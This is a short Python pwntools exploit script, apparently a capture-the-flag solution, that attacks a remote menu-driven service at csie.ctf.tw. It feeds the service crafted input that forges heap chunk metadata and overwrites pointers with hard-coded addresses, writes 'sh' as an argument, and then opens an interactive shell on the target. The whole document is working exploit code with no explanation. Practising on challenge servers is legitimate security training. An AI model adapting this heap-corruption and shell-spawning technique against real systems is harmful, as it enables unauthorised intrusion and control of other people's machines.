from pwn import *
#r = remote("0",8888)
r = remote("csie.ctf.tw",10152)
r.sendline("push")
r.sendline("65")
r.sendline("DEADBEAF")
r.sendline("pop")
r.send("pop".ljust(128-32)+p64(0)+p64(96|1)+p64(0)+p64(0x402110)[:-1])
r.sendline("push")
r.sendline("88")
r.send("A"*80+p64(0x402028)[:-1])
r.sendline("sh\x00".ljust(8)+p64(0x400730))
r.interactive()
